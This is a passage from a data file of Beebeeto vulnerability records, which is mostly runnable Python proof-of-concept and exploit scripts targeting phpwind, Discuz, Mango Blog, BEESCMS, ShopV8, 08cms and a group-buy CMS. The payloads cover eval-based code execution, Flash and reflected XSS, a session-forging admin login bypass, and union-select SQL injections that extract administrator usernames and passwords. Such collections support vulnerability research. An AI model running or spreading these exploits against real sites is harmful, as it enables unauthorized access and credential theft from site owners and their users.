keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-048523',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n vul_url = args['options']['target']+'/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n response = urllib2.urlopen(urllib2.Request(vul_url)).read()\r\n if '<title>phpinfo()</title>' in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == 
'__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Search.html \u53c2\u6570 keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c", "app_name": "Other", "id": "poc-2014-0062", "layer4_protocol": null}
{"create_date": "2014-10-10 11:32:36", "name": "phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0061', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-10', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['9.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpwind', 'xss', 'FlashXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-038433', # 
\u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"e971c772b2df839298a8f8f9451f1eda\"\r\n verify_url = args['options']['target'] + \"/res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?highlighterId=bb2\\\"))}catch(e){alert(1)}//'\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind9.0 res/js/dev/util_libs/syntaxHihglighter/scripts/clipboard.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0061", "layer4_protocol": null}
{"create_date": "2014-10-09 14:21:51", "name": "phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind,xss,flashxss", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0059', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'phpwind 9.0 /res/images/uploader.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-08', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['9.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['phpwind', 'xss', 'flashxss'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-017728', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = 
\"d85c815bc39c91725f264f291db70432\"\r\n verify_url = args['options']['target'] + \"/res/images/uploader.swf\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?jsobject=alert(1))}catch(e){}//'\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind 9.0 /res/images/uploader.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "PHPWind", "id": "poc-2014-0059", "layer4_protocol": null}
{"create_date": "2014-10-09 10:41:55", "name": "Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Discuz\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,flvplayer.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0057',\r\n 'name': 'Discuz! x3.0 /static/image/common/flvplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Discuz\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'flvplayer.swf'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.ipuman.com/pm6/138/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"7d675405ff7c94fa899784b7ccae68d3\"\r\n file_path = \"/static/image/common/flvplayer.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + '?file=1.flv&linkfromdisplay=true&link=javascript:alert(1024);'\r\n return args\r\n args['success'] = False\r\n return 
args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0057", "layer4_protocol": null}
{"create_date": "2014-10-08 16:54:37", "name": "Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Mango Blog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/archives.cfm/search", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0056',\r\n 'name': 'Mango Blog 1.4.1 /archives.cfm/search XSS\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MangoBlog',\r\n 'vul_version': ['1.4.1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Mango Blog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/archives.cfm/search'],\r\n 'desc': '''\r\n Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\r\n \u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87080',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/archives.cfm/search/?term=%3Csvg%20onload=alert(100)%3E'\r\n req = 
urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if '<svg onload=alert(100)>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Mango Blog\u6ca1\u6709\u6b63\u786e\u5730\u8fc7\u6ee4\u63d0\u4ea4\u7ed9archives.cfm/search\u9875\u9762\u7684term\u53c2\u6570\u4fbf\u8fd4\u56de\u7ed9\u4e86\u7528\u6237\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u6076\u610f\u53c2\u6570\u8bf7\u6c42\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u5bfc\u81f4\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u6267\u884c\u4efb\u610fHTML\u548c\u811a\u672c\u4ee3\u7801\u3002", "app_name": "Mango Blog", "id": "poc-2014-0056", "layer4_protocol": null}
{"create_date": "2014-10-05 12:37:26", "name": "BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u767b\u5f55\u7ed5\u8fc7", "tag": "Login Bypass,\u767b\u5f55\u7ed5\u8fc7,BEESCMS\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0052',\r\n 'name': 'BEESCMS 3.4 /admin/admin.php \u767b\u5f55\u7ed5\u8fc7\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-10-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'BEESCMS',\r\n 'vul_version': ['3.4'],\r\n 'type': 'Login Bypass',\r\n 'tag': ['Login Bypass', '\u767b\u5f55\u7ed5\u8fc7', 'BEESCMS\u6f0f\u6d1e'],\r\n 'desc': 'BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-059180',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n cookie = cookielib.CookieJar()\r\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\r\n urllib2.install_opener(opener)\r\n postdata = \"_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\\r\\n\"\r\n # get session\r\n request = urllib2.Request(args['options']['target'] + \"/index.php\", data=postdata)\r\n r = urllib2.urlopen(request)\r\n # login test\r\n request2 = urllib2.Request(args['options']['target'] + \"/admin/admin.php\", 
data=postdata)\r\n r = urllib2.urlopen(request2)\r\n content = r.read()\r\n if \"admin_form.php?action=form_list&nav=list_order\" in content:\r\n if \"admin_main.php?nav=main\" in content:\r\n args['success'] = True\r\n args['test_method'] = 'http://www.wooyun.org/bugs/wooyun-2014-059180'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "BEESCMS v3.4 /includes/fun.php \u5f31\u9a8c\u8bc1\u5bfc\u81f4\u540e\u53f0\u9a8c\u8bc1\u7ed5\u8fc7", "app_name": "BEESCMS", "id": "poc-2014-0052", "layer4_protocol": null}
{"create_date": "2014-10-03 13:30:40", "name": "\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0047',\r\n 'name': '\u6700\u571f\u56e2\u8d2d /api/call.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n 'author': 'Bug',\r\n 'create_date': '2014-10-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SQL Injection', '\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.moonsec.com/post-11.html'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/api/call.php?action=query&num=11%27%29/**/union/**/select/**/1,2,3,\"\r\n \"concat%280x7e,0x27,username,0x7e,0x27,password%29,5,6,7,8,9,10,11,12,13,\"\r\n \"14,15,16/**/from/**/user/**/limit/**/0,1%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = re.compile(r\".*?<id>\\s*~'\\s*(?P<username>[^~]+)\\s*~'\\s*(?P<password>[\\w]+)\\s*</id>\",\r\n 
re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2014-0047", "layer4_protocol": null}
{"create_date": "2014-10-02 11:03:23", "name": "ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,shopv8,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0045',\r\n 'name': 'ShopV8 10.48 /admin/pinglun.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP',\r\n 'author': 'Bug',\r\n 'create_date': '2014-10-02',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'shopv8', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['10.48'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'SQL Injection', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['SQL Injection', 'shopv8', '\u4fe1\u606f\u6cc4\u9732'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.shellsec.com/tech/2143.html'], # \u53c2\u8003\u94fe\u63a5\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/admin/pinglun.asp?id=1%20and%201=2%20union%20select%201,2,3,4,\"\r\n \"username,password,7,8,9,10,11%20from%20admin\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n pattern = 
re.compile(r'.*?id=[\\'\"]?pingluntitle[\\'\"]?.*?value=[\\'\"]?(?P<username>\\w+)[\\'\"]?'#\u5339\u914d\u7528\u6237\u540d\r\n r'.*?id=[\\'\"]?pingluncontent[\\'\"]?.*?>(?P<password>\\w+)</textarea>',#\u5339\u914d\u5bc6\u7801\r\n re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n match = pattern.match(content)\r\n if match == None:\r\n args['success'] = False\r\n return args\r\n username = match.group(\"username\")\r\n password = match.group(\"password\")\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['Username'] = username\r\n args['poc_ret']['Password'] = password\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728pinglun.asp\u6587\u4ef6", "app_name": "Other", "id": "poc-2014-0045", "layer4_protocol": null}
{"create_date": "2014-09-30 22:21:24", "name": "Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "XSS\u6f0f\u6d1e,mp3player.swf,Discuz\u6f0f\u6d1e,FlashXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0044', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Discuz x3.0 /static/image/common/mp3player.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': 'tmp', # \u4f5c\u8005\r\n 'create_date': '2014-09-30', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['3.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['XSS\u6f0f\u6d1e', 'mp3player.swf', 'Discuz\u6f0f\u6d1e', 'FlashXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.ipuman.com/pm6/138/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n 
flash_md5 = \"f73b6405a9bb7a06ecca93bfc89f8d81\"\r\n file_path = \"/static/image/common/mp3player.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz X3.0 static/image/common/mp3player.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Discuz", "id": "poc-2014-0044", "layer4_protocol": null}
{"create_date": "2014-09-30 22:05:44", "name": "08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection,08cms\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0043', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': '08cms 3.1 /include/paygate/alipay/pays.php SQL\u6ce8\u5165\u6f0f\u6d1e EXP', # \u540d\u79f0\r\n 'author': 'Bug', # \u4f5c\u8005\r\n 'create_date': '2014-09-30', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': 